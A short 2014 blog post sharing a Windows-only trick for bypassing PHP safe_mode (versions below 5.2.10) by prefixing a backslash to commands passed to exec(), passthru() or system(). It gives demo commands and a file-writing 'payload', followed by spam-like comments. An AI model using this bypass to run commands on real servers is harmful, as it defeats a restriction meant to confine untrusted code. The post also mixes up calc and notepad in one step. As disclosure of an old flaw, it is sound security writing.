Thursday, October 23, 2014

Posted by Paulos Yibelo
6 comments | 2:19 PM

Note: This method only works on windows and isn’t discovered by me, but one of the greatest web researchers I know, I just had to share it.

So, to test this, make sure you have php version less than 5.2.10 on a windows machine.
make sure your php.ini file says on for safe_mode or simply by doing

C:\xampp\php>php -n -d safe_mode=on -r “exec(‘notepad’);”

The command “/notepad” is either misspelled or could not be found.

So what does that tell us? its like all safe_mode doing is ad a "/" in whatever input we gave it (would be bad), aside from lots of other bypasses you might think of, one , for windows only, can be used to bypass safe_mode, by using backslashes infront of the command:

C:\xampp\php>php -n -d safe_mode=on -r “exec(‘\calc’);”

Aside from many errors being generated, the code still gets executed and notepad will now pop up.

so our final payload to execute commands while safe_mode is 1 is:

<?php exec('\echo "SHIT" >> notepad.txt'); ?>

works with exec(), passthru, system() functions.


  1. Great Post, Actually PHP is a beautiful source for developing a database driven web application, I love this post, thanks for spending your time for discussing about this topic.
    PHP Training in Chennai

  2. This comment has been removed by the author.

  3. Great post! Will try to release your method on my own website! Thanks!

  4. Much thanks, the information is certainly wholesome! I can see that the searcher is a specialist in the area. As contrasted with the numerous guest posts I have looked over on the question, this one offers advanced viewpoints. This web site frequently furnishes a quantity of interesting posts on the vital concerns. My sister and I read them constantly.

  5. The investigation is surely helpful! Without a doubt, the researcher is talent in the field of speciality.